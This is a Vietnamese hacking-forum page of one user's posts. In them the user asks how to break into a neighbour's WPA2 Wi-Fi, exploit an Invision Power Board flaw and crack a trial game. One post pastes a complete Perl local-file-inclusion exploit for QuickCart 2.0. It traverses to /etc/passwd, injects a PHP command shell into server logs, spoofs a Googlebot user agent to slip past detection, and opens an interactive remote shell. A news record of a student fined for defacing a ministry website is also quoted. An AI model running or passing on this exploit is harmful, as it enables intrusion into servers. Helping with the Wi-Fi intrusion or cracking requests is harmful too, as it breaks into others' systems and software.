banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: pthanhkim  XML
Profile for pthanhkim Messages posted by pthanhkim [ number of posts not being displayed on this page: 0 ]
 
dùng AVG bạn à smilie
dùng AVG bạn à

tinhkynu.it wrote:
Em không biết gửi vào đâu cho nên gửi trong này.
Mong ban quản trị đừng vội xóa của em nhé.
Các anh trong HVA thường là đã đi làm hay ít nhiều cũng đã có kinh
nghiệm về lập trình hệ thống. Xin cho hỏi:
1. Ngôn ngữ nào thường được sử dụng nhiều cho Lập trình hệ thống
2. C# và Java có được tuyển dụng nhiều cho Lập trình hệ thống
3. Cảm ơn Ban quản trị và các anh nhiều 


ASM hoặc C/C++. C# hoặc VB.NET và Java có thể viết 1 vài ứng dụng cho hệ thống nhưng phải thông qua .NET framework hoặc JAVA Platform nên chủ yếu vẫn là ASM hoặc C/C++.
Thân

kegiaumat055 wrote:
Anh ơi cho em hỏi 2 chương trình Hello.asm này đều được viết bằng ASm nhưng sao nó lại khác nhau.Anh có thể giải thích được không và chọn cách viết nào là tốt nhất

Đây là hello.asm thứ nhất:

Code SEGMENT
ASSUME CS:Code,DS:Code
ORG 100h
Begin
MOV AH,09h
MOV DX,Offset String
Int 20h
String DB ' hello,how are you ? $ '
Code Ends
END Begin

Đây là hello.asm thứ hai:
.model small
.stack 100h
.data
s DB “hello,how are you ? $” ; khai báo xâu kí tự cần in
.code
mov AX,@data ; lấy địa chỉ data segment ghi vào DS
mov DS,AX ; Vì model small, đây cũng là địa chỉ
; segment của xâu s

; xuất chuỗi
mov DX, OFFSET s ; lấy địa chỉ offset ghi vào DX
mov AH , 9
int 21h ; gọi hàm 9, ngắt 21h để in

mov AH, 4Ch ; Thoát khỏi chương trình
int 21h
end 


Chương trình 1 không cần đoạn stack mặc định IP Flags=100h không có đoạn DATA. Chương trình 2 sử dụng stack và có đoạn DATA

Thân chào
Đôi khi Kim xem những bài viết có dạng sau :

Bài viết này được chỉnh thành dạng "ẩn" vì mang tính vi phạm nội quy của diễn đàn hoặc đang được điều chỉnh cho thích hợp với nội quy của diễn đàn.

Vậy xin phép HVA cấp hoặc nâng account của Kim có thể xem được các bài viết dạng ẩn. Mục đích để học hỏi thêm kinh nghiệm thôi chứ không có phá hoại gì hết.

Thanks

kienmanowar wrote:
Chắc đây là tài liệu mà bạn cần :

Code:
Name WIN32.HLP, the Win32 Programmer's Reference
Description This is the famous Win32 Programmer's Reference help file containing all information for Win32 programming.


Link download :

Code:
http://www.winasm.net/index.php?ind=downloads&op=download_file&ide=23&file=win32help.zip


Best Regards
kienmanowar 


Thanks bạn nhiều lắm. Đây đúng là tài liệu hữu ích để tra cứu API
kiss
smilie
Kim tìm kiếm trong thư viện của HVA sao không thấy có cuốn ebook nào viết về full các API for Windows nhỉ. Các bạn nào có xin share dùm nhé.
Thanks
smilie

tmd wrote:
Cách thức trả lời bên trên, giúp cho nhân viên reset modem được lảnh lương sớm. Nếu mình không có quyền hành gì, không phải nhân viên có thẩm quyền để làm chuyện đó thì đừng có rớ vào. Táy máy kiểu này hay được nhận thư sớm. 


Xin đọc kỹ chỗ này "Cách nào mà vào được cái moderm là được rồi !! " còn việc có nhận được thư hay không là chuyện khác nhé.
reset cái modem roi dung default password là vào được
Đã qua 3 ngày không thấy ai trả lời smilie(
Search trên diễn đàn "Những cuộc đối thoại với rookie" của bạn conmale để hiểu hack là gì ( bật mí h + a + c + k = hack) smilie)
Đọc tới chỗ này mình thấy hơi vui vui. mong các bạn góp chút ý kiến.

3.2 Upload file getdb.php
Bạn chỉ việc upload lên hosting mà bạn vừa đăng kí http://root/mysite/getdb.php  


đâu phải host nào cũng dễ dàng cho bạn upload ?
đã vậy còn không kiểm tra đuôi ".php" nữa

nếu up được thì up luôn con shell cho khỏe. smilie)
Chào các bro.
Kim đang lướt web thì thấy CVE-2006-4155.

A vulnerability has been identified in Invision Power Board (IPB), which could be exploited by malicious users to bypass security restrictions. This flaw is due to an error in the threaded view mode ("func_topic_threaded.php"), which could be exploited by attackers to gain unauthorized access to certain posts outside a topic.

Kim đã search trên HVA nhưng không có kết quả. Không biết các bác nào biết cách khai thác xin hướng dẫn chỉ giúp.
Đa tạ
Cảm ơn bài viết của bác thangdiablo rất hay và khá tổng quát nhưng ông hàng xóm nhà Kim đang xài là WPA2 smilie( . Man-in-the-Middle Attacks rất hay có ai biết cách xử dụng và các tools của nó xin chỉ giúp ?
Kim đã search trên diễn đàn với từ khóa WPA2 nhưng chì có 5 chủ đề nhưng cũng ko thấy có hướng dẫn access WPA2. chắc mượn ông google xài thử. Nếu không có nữa thì đành từ bỏ ý định thôi :lolsmilie Đâu phải cái gì cũng được tất smilie)
Câu hỏi khó quá hay sao mà không thấy ai trả lời hít hix hix.
HVA pó tay smilie

Sau khi tìm kiếm thì thấy trên securityfocus có hướng dẫn cách WEP key cracking nhưng dù gì cũng chỉ xoay quanh sniffer ... nhưng theo Kim nghĩ nó sẽ hữu dụng cho những ai gần nhà có WEP. smilie) Còn WPA thì từ từ nghiên cứu nhé các bạn.

Phần 1: Wireless Forensics: Tapping the Air - Introduction
http://www.securityfocus.com/infocus/1884

Phần 2: Wireless Attacks and Penetration Testing
http://www.securityfocus.com/infocus/1785

Chúc các bạn may mắn.
Ai có cách hack WPA hoac WPA2 xin chỉ giúp nhé. Thanks
Hiện nay công nghệ wireless phát triển rầm rộ có những nơi free access thì quá khỏe nhưng có những nơi lại bị lock như chỗ Kim đang ở. Kim không biết cách xâm nhập dạng security encryption WEP WEP2 WPA WPA2.
Search trên mạng thì chỉ biết có Ethereal Sniffer, ngoài ra còn cách nào khác không ? Nhưng nếu là WPA thì sẽ bị encryption trước khi broadcast. việc bắt các packet có encrypt này ko dễ dàng chút nào. Có ai biết cách nào khác ko xin các bạn chỉ giúp. Nếu có cả chuyên đề về bài Wireless thì càng hay. :lolsmilie

Xin lỗi vì đã lộn box, ai mod xin move dùm qua thảo luận thâm nhập
thanks nhiều smilie

hackernohat wrote:
Hèm người ta fake thành GoogleBot, để làm cho IDS bỏ qua, vì GoogleBot hoạt động kỉu một con bot và cái script exploit kia cũng vậy nó cũng hoạt động như 1 bot, vậy nên việc giả GoogleBot là để thế, đằng ấy giả Mozilla FF thì cũng vô ích, vì khi đó cái script là Một normal user, lộ cái một, IDS "diệt". 


Hi hi, ra là vậy, Kim sửa lại cho giống với Mozilla cứ nghĩ là qua mặt như dạng Browser mà không hiểu rõ ẩn ý của Google bot, cảm ơn các sư huynh đã chỉ giáo, muội muội thanks very much smilie)
xin kiss hackernohat 1 cái nha smilie)
Nếu bạn nào muốn biết cơ bản thì vào đây xem bài của bạn mrdung Tiêu đề: Phân tích exploit PHP remote include file và cách fixed http://www.htmlforum.net/hvaonline/posts/list/501.html

conmale wrote:
Chà... có điểm này khá lý thú smilie) :

print $scmd "Host: $target\n";
print $scmd "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
print $scmd "Accept: text/html\n";
print $scmd "Connection: close\n\n\r\n";


Một dạng mạo danh để qua mặt "defense system".  


Vâng, Nếu muốn thì sửa lại mạo danh thành Mozilla có dạng như sau :wink: :

Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.1) Gecko/20061205 Firefox/2.0.0.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en,en-en;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Search Google được thông tin về Local Inclusion File cho chị em ta :

Code:
#################################################################################################
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# writ3r [at] gmail.com #
# #
# QuickCart 2.0 Local File Inclusion Exploit #
#################################################################################################
# Software: QuickCart 2.0 #
# #
# Vendor: http://opensolution.org/ #
# #
# Released: 2006/12/03 #
# #
# Critical: Moderately crtical #
# #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) #
# #
# Note: The information provided in this document is for Quick Cart administrator #
# testing purposes only! #
# #
# register_globals must be on #
# gpc_magic_quotes must be off #
# #
# actions_admin/categories.php?config[db_type]= #
# actions_admin/couriers.php?config[db_type]= #
# actions_admin/orders.php?config[db_type]= #
# actions_admin/products.php?config[db_type]= #
# actions_client/products.php?config[db_type]= #
# actions_client/orders.php?config[db_type]= #
# #
# Vulnerable code: #
# require_once DIR_CORE.'couriers-'.$config['db_type'].'.php'; #
# #
# Patch: (Place this code at the top of every file) #
# if(basename(__FILE__) == basename($_SERVER['PHP_SELF'])) #
# die(); #
# #
# Exploit: categories.php?config[db_type]=../../../../../../../../../../../etc/passwd%00 #
# Usage: perl localfilexpl.pl 127.0.0.1 actions_admin/categories.php?config[db_type]= #
#################################################################################################
############################################################################
# Local File Inclusion Exploiter #
# #
# This script attempts to exploit a local file include vulnerability #
# by finding a readable http log file, then by sending a specially crafted #
# http request to the server in order to insert a PHP Shell into the #
# log files. A shell is then spawned. #
# #
# Created By r0ut3r (writ3r [at] gmail.com) #
############################################################################
use IO::Socket;
use Switch;
$port = "80"; # connection port
$target = @ARGV[0]; # localhost
$vulnf = @ARGV[1]; # /include/WBmap.php?l=
$opt = @ARGV[2]; # -p (not needed)
sub Header()
{
print q {Local File Inclusion Exploiter - By r0ut3r (writ3r [at]
gmail.com)
-------------------------------------------------------------------
};
}
sub Usage()
{
print q {Usage: localfilexpl.pl [target] [folder & vulnerable file]
[opt]
Example: localfilexpl.pl localhost /include/WBmap.php?l= -p
opt = -p (To print recieved content)
};
exit();
}
Header();
if (!$target || !$vulnf) {
Usage(); }
@targets = (
"var/log/httpd/access_log",
"var/log/httpd/error_log",
"var/log/access_log",
"var/log/error_log",
"var/www/logs/access.log",
"var/www/logs/access_log",
"var/www/logs/error_log",
"var/www/logs/error.log",
"apache/logs/access_log",
"apache/logs/error.log",
"etc/httpd/logs/access.log",
"etc/httpd/logs/access_log",
"etc/httpd/logs/error.log",
"etc/httpd/logs/error_log",
"usr/local/apache/logs/access.log",
"usr/local/apache/logs/access_log",
"usr/local/apache/logs/error.log",
"usr/local/apache/logs/error_log",
"var/log/apache2/error_log",
"var/log/apache2/error.log",
"var/log/apache2/access_log",
"var/log/apache2/access.log",
"access_log",
);
@paths = ();
$dirs = 5;
$count = 0;
foreach $target (@targets)
{
for(0..$dirs){
$paths[$count+$_] = "../"x$_ . $target;
}
$count += $dirs;
}
print "[+] Attempting to locate log file\n";
$log = "";
foreach $path (@paths)
{
#print "$path\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target,
PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $sock "GET ".$vulnf.$path."%00 HTTP/1.1\n";
print $sock "Host: $target\n";
print $sock "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
print $sock "Accept: text/html\n";
print $sock "Connection: close\n\n\r\n";
while (<$sock>)
{
if (/<title>404 Not Found/)
{
print "[-] Vulnerable file not found! Exiting... \n";
exit();
}
if (/Permission denied/) {
print "[-] Log file found, but permission was denied
to read file. [".$path."] \n"; }
if (/(.*?).(.*?).(.*?).(.*?) - - \[(.*?)/)
{
if ($path ne $log) {
print "[+] Log file found! [".$path."] \n"; }
$log = $path;
}
}
}
if ($log eq "") {
print "[-] Log file not found. Exiting...\n"; exit(); }
$cmdfunct = "system";
print "[+] Inserting PHP Shell into logs\n";
$code = "<?php ob_clean(); echo 'r0ut3r - Local File Include Expoiter '; echo
".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort =>
$port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";
@cmdfunctions = ("exec", "shell_exec", "passthru");
$enabled_funct = false;
$xpl_test = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target,
PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl_test "GET ".$vulnf.$path.$log."%00&cmd=dir HTTP/1.1\n";
print $xpl_test "Host: $target\n";
print $xpl_test "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
print $xpl_test "Accept: text/html\n";
print $xpl_test "Connection: close\n\n\r\n";
while (<$xpl_test>)
{
if (/system\(\) has been disabled for security/)
{
print "[-] system() function is disabled. \n";
foreach $cmdfunct (@cmdfunctions)
{
if ($enabled_funct eq false)
{
print "[+] Trying ".$cmdfunct."()\n";
$code = "<?php ob_clean(); echo 'r0ut3r - Local File Include Expoiter '; echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect.
Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";
$xpl_retry = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect.
Exiting...\r\n";
print $xpl_retry "GET ".$vulnf.$path.$log."%00&cmd=dir HTTP/1.1\n";
print $xpl_retry "Host: $target\n";
print $xpl_retry "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl_retry "Accept: text/html\n";
print $xpl_retry "Connection: close\n\n\r\n";
while (<$xpl_retry>)
{
if (/b>: $cmdfunct\(\) has been disabled for security reasons/)
{
print "[-] ".$cmdfunct."() function is disabled. \n";
$enabled_funct = false;
last;
}
else
{
$enabled_funct = true;
}
}
if ($enabled_funct eq true)
{
print "[+] Enabled function found! [".$cmdfunct."]\n";
break;
}
}
}
if ($enabled_funct eq false) {
print "[-] No enabled cmd function found. Tried system(),
exec(), shell_exec(), passthru()\n"; exit(); }
}
}
print "[!] Command execution at: http://".$target.$vulnf.$log."%00\n";
print "[+] Creating shell - Type 'exit' to quit\n";
print "[cmd]\$ ";
$cmd = <STDIN>;
$cmd =~ s/ /%20/g;
while ($cmd !~ "exit")
{
$scmd = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target,
PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $scmd "GET ".$vulnf.$path.$log."%00&cmd=".substr($cmd, 0, -1)."
HTTP/1.1\n";
print $scmd "Host: $target\n";
print $scmd "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
print $scmd "Accept: text/html\n";
print $scmd "Connection: close\n\n\r\n";
# prints output from command execution
if ($opt eq "-p")
{
while (<$scmd>)
{
print <$scmd>;
}
}
print "[cmd]\$ ";
$cmd = <STDIN>;
$cmd =~ s/ /%20/g;
}


# milw0rm.com [2006-12-03]
Tin tức từ báo tuổi trẻ online đây :

Biên bản xử lý vụ xâm nhập website Bộ GD-ĐT

Buổi họp xử lý vụ vi phạm hành chính của em Trí ngày 03-01-2007 - Ảnh: Quang Vinh
TTO - Ngày 03-1-2007, tại Sở Bưu chính viễn thông tỉnh Vĩnh Long, ông Nguyễn Thới Bình, giám đốc sở đã chủ trì buổi họp lấy ý kiến của đại diện cơ quan cảnh sát điều tra, nhà trường, gia đình và chất vấn trực tiếp em Bùi Minh Trí để xem xét trước khi đưa ra mức xử phạt hành chính. Để bạn đọc hiểu thêm vụ việc, chúng tôi xin đăng nguyên văn biên bản buổi làm việc nói trên.

>> Ngày 20-11 hay 27-11?
>> Trao đổi tiếp với Bộ trưởng Nguyễn Thiện Nhân

BIÊN BẢN LÀM VIỆC

V/v xử lý vi phạm hành chính em Trí vi phạm web Bộ GD-ĐT

Hôm nay, hồi 08g00, ngày 03 tháng 01 năm 2007

Tại Sở Bưu chính viễn thông tỉnh Vĩnh Long

Chúng tôi gồm:

1. Họ và tên: Nguyễn Thới Bình, chức vụ: Giám đốc Sở BCVT

2. Họ và tên: Lê Minh Thương, Phụ trách thanh tra Sở

3. Họ và tên: Nguyễn Văn Nguyên, CVTH

4. Họ và tên: Nguyễn Thùy Kha, CV Thanh tra

5. Họ và tên: Phạm Minh Hiền, Phó phòng PC15 CA tỉnh Vĩnh Long

6. Họ và tên: Nguyễn Hoàng Sang, Cán bộ phòng PC15

Làm việc với:

1. Họ và tên: Bùi Chí Hiếu, Hiệu trưởng trường Nguyễn Bỉnh Khiêm

2. Họ và tên: Bùi Thanh Hồng, bố em Trí

3. Họ và tên: Võ Thị Kim Phượng, mẹ em Trí

4. Họ và tên: Bùi Minh Trí, người vi phạm

Về các nội dung sau: (Ý kiến giữa các bên trình bày)

Ông Giám đốc Sở Bưu chính Viễn thông chủ trì họp giới thiệu nội dung làm việc, thành phần làm việc và các yêu cầu cần thiết trong quá trình làm việc:

- Làm việc cần chất vấn em Trí để làm rõ thêm về hành vi vi phạm

- Khi cần thiết, hội nghị xin ý kiến các thành phần khác

- Yêu cầu với em Trí là thành khẩn, trung thực để xem xét xử lý hợp tình hợp lý.

Chủ trì: yêu cầu em Trí cho biết:

Em có động cơ nào khi xâm nhập trang web của Bộ Giáo dục đào tạo? Khi xâm nhập dùng công cụ gì? Ngoài việc thay ảnh Bộ trưởng thì em còn làm gì nữa không?

Ý kiến em Trí: Em vào trang web Bộ Giáo dục đào tạo là để xem trang web có lỗi không và nếu có thì cảnh báo để sửa lỗi. Em vào trang web Bộ Giáo dục đào tạo bằng lỗi bảo mật và để lại Netcat. Tháng 7-2006, em vào web và để lại Netcat rồi sau đó quên không sử dụng. Lần vô sau, em thay ảnh để lại file tin index, html với ý cảnh báo như lần vào web như nhưng lần trước đó.

Về file tên là Guan.yu.html là file gì?

Em Trí trình bày: Guan.yu.html chỉ đơn thuần là tên file mà không phải là virus.

Về số lần em Trí vào trang web của Bộ Giáo dục đào tạo và thay ảnh Bộ trưởng thời gian nào? Trong bao lâu?

Em Trí trình bày: Em không nhớ chính xác số lần đã vào trang web Bộ Giáo dục đào tạo nhưng lần đầu tiên vào khoảng cuối tháng 7-2006. Em thay ảnh Bộ trưởng vào ngày 27-11-2006 trong khoảng từ 5 đến 15 phút.

Về việc để lại Netcat,

Em Trí trình bày: khi vào web Bộ GDĐT em có để lại Netcat và sau đó quên xóa chứ không có mục đích gì.

Khi em để lại file có ai ở Bộ GD-ĐT liên hệ với em không? Liên hệ bằng hình thức gì?

Em Trí trình bày: Đến ngày 11-12 có anh ở Bộ GD-ĐT liên lạc bằng hình thức chat với em, anh xưng tên là Tuấn (nhưng sau ngày 19-12 anh xưng là Kiên), nội dung là anh ấy nói cứ đưa cho anh ấy hướng lỗi để anh ấy tự xử lý.

Về việc nhận thức vi phạm ra sao.

Em Trí trình bày: Việc làm của em là sai trái, trước hết đó là thay ảnh thầy Bộ trưởng em đã vô lễ với thầy. Thứ hai là em đã xâm nhập trái phép vào trang web của Bộ là vi phạm quy định của nhà nước. Tuy nhiên em hoàn toàn không có mục đích xấu.

Về việc trước đây em đã vào trang web nào chưa?

Em Trí trình bày: Trước khi vào trang web của Bộ GD-ĐT thì em đã vào một số trang web khác báo lỗi và hợp tác sửa lỗi với họ.

Về việc em có biết vi phạm luật khi vào trang web không?

Em Trí trình bày: Em không ý thức được trước khi vào trang web là việc vào trang web là hành vi vi phạm luật.

Về việc vào trang web em có tham gia cùng nhóm nào không?

Em Trí trình bày là em chỉ làm một mình và cũng không có tham gia tổ chức hay nhóm nào cả.

Ý kiến thầy hiệu trưởng:

Nhà trường thấy em Trí là học sinh giỏi, có đạo đức, rất hoan nghênh cơ quan chức năng đưa vụ việc ra xử lý hành chánh. Em Trí có lỗi, nhà trường cũng có trách nhiệm, trước nay nhà trường chỉ có cảnh báo học sinh những tác động xấu từ trang web mà chưa có giáo dục pháp luật liên quan cho học sinh. Nhà trường cũng đã nhận được tự kiểm của em Trí, trong kiểm điểm em Trí thành khẩn nhận lỗi nhưng phạm vi nhà trường chỉ xử lý hành vi đạo đức của học sinh Trí khi thay ảnh thầy Bộ trưởng.

Ý kiến gia đình:

Gia đình rất lấy làm tiếc, xin nhận khuyết điểm khi chưa sâu sát trong việc giáo dục con mình. Gia đình hứa sẽ quan tâm hơn nữa việc giáo dục con nên người và đề nghị cơ quan chức năng xem xét hành vi của cháu trong điểu kiện xét sự nông nổi, sự vô tình của cháu để xử lý cháu sao cho không bị ảnh hưởng đến học tập, thi cử.

Kết luận của chủ trì:

Việc em Trí vi phạm trang web của Bộ GD-ĐT là hành vi vi phạm pháp luật. Qua xem xét các tình tiết:

- Em Trí là một học sinh giỏi, hạnh kiểm tốt, gia đình chấp hành chủ trương chính sách của Đảng và Nhà nước tốt.

- Em có năng lực, trình độ về tin học, say mê tìm hiểu và ý thức pháp luật còn non kém nên đã vi phạm.

- Sau khi vi phạm, em Trí thật thà khai báo, hợp tác với cơ quan điều tra.

Những tình tiết trên là rất quan trọng khi xem xét xử lý sao cho em Trí rút ra được bài học cho mình và thể hiện được sự nghiêm minh của pháp luật. Xử lý em Trí còn nhằm để cảnh báo chung, răn đe giáo dục. Do vậy áp dụng các điểm g, k khoản 5 điều 41 Nghị định 55 của Chính phủ xử phạt vi phạm hành chính em Trí là phù hợp. Sở xem xét áp dụng mức phạt hành chính thấp nhất của hành vi này là 10 triệu đồng.

Buổi làm việc kết thúc hồi 10g cùng ngày. Biên bản gồm có 5 trang, đã đọc lại cho các bên cùng nghe và cùng ký tên.

Người được mời Người chủ trì Người lập biên bản

Bùi Minh Trí Nguyễn Thới Bình Nguyễn Văn Nguyên


Mất 10 chai đáng buồn thật = con yahoo gái xinh hix hix. Lần này cho anh em rút kinh nghiệm mấy web site nhạy cảm thì đừng phá nhé smilie)
Có 1 điều hơi théc méc là tại sao Bùi Minh Trí không để thêm bản nhạc trong Album Secrect Garden nhỉ cho giống với hì hì.net smilie

shuichi_akai wrote:

lihavim wrote:

nora wrote:
Ui dào lỗi họ đã fix rùi, rào dậu hết rùi mà sư huynh 

Vậy mục đích của việc đưa lên là gì?
 


Tò mò, "hôi của",... smilie  


Nè nè Kim không phải vậy đâu mà nói nhé. Mục đích hỏi là tìm những trang khác để test thử, chứ nhà đang cháy nhảy vô cho chết chung hết ráo à ? Còn hôi của bạn hiểu sao là hôi của hử không nhẽ bạn học lại từ người khác cũng là hôi của à, nói năng cho cẩn thận nhé, trừ bạn 1 điểm smilie)
Trùi ui Kim chưa kịp coi đã bị bác PXMMRF điều chỉnh hết trơn rùi đọc hông hiểu gì hết hix hix. Xóa kiểu này chắc mai mốt hết dám hỏi luôn quá hic hic smilie(

nhocbmt wrote:
Sao anhdenday biết nó bị sql inject ?

1. Nóa sài php ! Việc inject là rất khó khi ko biết cấu trúc db !

Theo tớ biết :

1. Local inclusion file
2. Bug từ fckeditor

Đã kiểm chứng smilie 


Yeah merci, mình cũng nghĩ không phải là dính SQL inject đâu. có lẽ bạn nhocbmt đúng rùi đó, anh em nhào vô nghiên cứu nhé.
Xin hỏi có ai biết về lỗ hổng của BGDDT mà Bui Minh Tri da su dung tren website http://www.moet.gov.vn/ khong ?
Đã 3 ngày trôi qua, không thấy ai trả lời hết hic hic, các cao thủ HVA đâu hết rùi xin trợ giúp muội muội nào hic hic. Lẽ ra theo nguyên tắc hoạt động thì phải so sánh 2 chuỗi, nếu chuỗi = key thì sẽ kích hoạt chế độ full version, nhưng đằng này không hiểu Arcadetown đã làm thế nào mà Kim debug vẫn không ra được chuỗi chứa key hix hix. Mong các bạn trợ giúp. smilie(
Số là như vầy tình cờ Kim đọc được 1 bài hướng dẫn chơi game trên trang thanh niên http://www.thanhnien.com.vn/CNTT/Games/2006/6/22/153098.tno
Kim đã download về game Master Of Defense - Chuyên Gia Phòng Thủ. Chơi demo cảm thấy rất hay, Nhưng sang ngày hôm sau thì trial demo expire smilie( Không còn cách nào khác là phải tự mình crack thôi. Kim đã dùng ollydbg open file Main.exe rồi run thử, ý ẹ nguyên cái dialog hiện ra không thể debug được, nên mình quay sang attach program thật mừng là đã attach được, niềm vui không bao lâu đã vụt tắt khi search toàn bộ UNICODE và string trong memory không tìm thấy được key để unlock. Kim đã loay hoay mãi 2 tuần nay rồi vẫn chưa crack được Bó tay rồi mong các cao thủ trợ giúp hic hic.
link download game Master Of Defense là :
http://dl.arcadetown.com/downloads/masterofdefense_at.exe
 

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|